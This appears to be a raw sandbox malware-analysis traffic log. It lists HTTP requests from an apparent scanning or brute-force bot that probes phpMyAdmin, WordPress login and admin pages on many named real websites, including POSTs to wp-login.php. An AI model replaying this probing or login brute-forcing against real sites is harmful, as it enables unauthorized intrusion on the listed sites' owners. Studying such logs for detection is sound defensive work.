Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mydirectlender.com/wp-login.phpContent-Length: 160Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://samson.pe/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipCookie: originDirect=trueUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /404/ HTTP/1.1Host: www.grg17geblergasse.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.grg17geblergasse.at/-/-/-/-/-/-/-/-/-/-/
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://beachrecruitment.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=se72ph7k70j2cc32bsjadoqrl1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://engel-firm.com/wp-login.phpContent-Length: 175Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=9et5pla7nsi6m08nuam1qvco53User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fadministrator%2Findex.php HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin/pages/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php?wpe-login=true HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=dab896062cb0564a47230c1071235746User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://tiswheels.com/wp-login.phpContent-Length: 139Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6IkRGblFZYmpUVTZaZXRlak41aDlickE9PSIsInZhbHVlIjoicDZZcjdvK2hoOHJhUmp5VXBPRmJnOXQxRDJkRXdNZnVUaUlZUWZNajY4Vlo5WUNZTG1ISDdVT1cwb1N4S0Y2MHZZU3hwODdRWDZWNjBFa251cXl2MGgvSFp3UEl6ZzNUME82N3Y1MVY5MGU5MmIyTWdKWDNNNXhMdGhMQ0RnRjAiLCJtYWMiOiI3N2M0YTFhMGY2YTc5NDgzMTIxNTNkZTA1YjY5Njk5YWJhYTE2Mzc4YzM5ODg5OWY1ZTNmYzNjYmI2NzQ3NDA5IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Ii9HaFdPWjhha0p0ZmprRks4OFhJMnc9PSIsInZhbHVlIjoiaWRxOTdEeUg5dVJqRHVtQ0g1R3VNUWJwSDFiZUkzMWNMUWQ3ZWU5bFNpS0t4Q0ViWExvRUJDamxtNkNwaVp1V205NHVvVlJlQUVRdVVsUzJEWEFwbnk3UzBtSHZscmc5UWZ4dkpxS1grRUY0WHAyQ1ZqZkRsOTNWakxwd21DZVMiLCJtYWMiOiI5ZmIxZGJiZmFiZjJlMzZjYTVjN2ZiODE0ZmMyZDlkNTQzNmFkMWRlOGI0YjBmMDhkOWZjNGNlZmZiMmI3ZjgzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IjUxMTZseFR4OVdFOURpd3BzcUZ1TFE9PSIsInZhbHVlIjoiT1VlNmdtbmVOaityUVE0UzY3Qjh6TFUyeVEzUzBaL29ldUs3ZjBFbC9iV3FHdG9JQmlQampzeUdwOVg4Zk5vYytQdXJTd0dGK1M1ZVZ3MzFBVHRRRE0rMDFIbWZwaHVveEMrQXB4TTlvVjJIRTE2LytvdkZHNStHb0RTanAwajciLCJtYWMiOiI2ODUzMmM0MDU0YzY4ZjJlMzBjMjUwNTFjMjYyN2E2Y2Q4Y2Y5ODk4Y2QxYjIxNTVkYjExOTE2NzRmZDUyNWViIiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6ImFaN0VzMVVDbXAvRDkyTnVRTzV0dXc9PSIsInZhbHVlIjoiQ1RrUXRVb0ZpRlFJbEpYRG82SUhOc0tBL1l1enluT3MyWkE0cVVlb1czK21aUitnQUlQUWl3bmZkOEtINTBFRlZ6UG1RSVNNU01zK3AyS2R3c25WbXlqVFRubnp0VVNpVGJWVlI5d2d2STlkK1dvRHN3WmZXcktLUVZ4WVR0OHoiLCJtYWMiOiI4ODk3YmFiZWJhNWQ1OGM4OTM4YjdmNGJmYWI5M2JiM2Q1YjEyOGU2NTE1ZDE4MmE0MTFlOTc4OGIyZGUzNzAyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InVZN29GKzIwOFdCWTc0d3k1Y1J6OWc9PSIsInZhbHVlIjoiUnJhQ3h1dkxsVDJvOW1HeFFna3pqN2FsRWpPMEwwSjFwNVQwNjlmVUJkUmhjRjA5VXNaSTBkcGNUV0E2UXJNOGluNzN2bzhHN3Bnc2xySDQxdlNUVkp4OGhzSDlFNnR0SUtISHBETzhIUjMzcE83MWtjc2dOL3hnMHpiWWQ1Q20iLCJtYWMiOiI0NzYxMjc3MWRkYjMxOTk5NDRjNjc4ZTY5MDJjY2U2OTk3ZjgwMjc1Yzg5ZDFmOGEzMzRhMGViNmI1YTU3NGQ4IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InpSM1A3WnZQd1FBWE0zYndjS3lTMVE9PSIsInZhbHVlIjoiSVV2dW5TdHArb1liMVNCeG5EVjFwR1RJN1dWYmhLRE5scXJaOXFyVlF2d1RkcXNSVnZkTk5xeWJCTkh6dFl4STF4NzIwL25sWTZJUUs4T1hvYzBTKzBwWi9HZDZSR0lreDlFQzBkanB3eTFLWHExbTg3SmM3Rm9raklEZmFBL08iLCJtYWMiOiJlNjI4YTJlZjk4YTk5M2MzYzRkMTAwNmY2NTNiMzIxZmY1MzE1MGM0Y2VhMDc5YmFmYTRkMjk3YTgzYzZiZDY2IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/wp-login.php
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=9lma3oral9i39bi8q8vm70o157User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://beachrecruitment.com/wp-login.php
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.rech.com/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bunasta.eu/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=90qdef5au19fnromgduipcu8s5User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=jj4h1tsj14o7hg5cov2fqll3o0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://coralparkchristian.org/wp-login.phpContent-Length: 135Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/
Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: POST /wp/wp-login.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.ceuandalucia.es/wp/wp-login.phpContent-Length: 140Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=9et5pla7nsi6m08nuam1qvco53User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=GmdO4O16OvcSRs1S5vpImz7iIXsw5EPzJkhrzhXEoHc-1700978384404-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
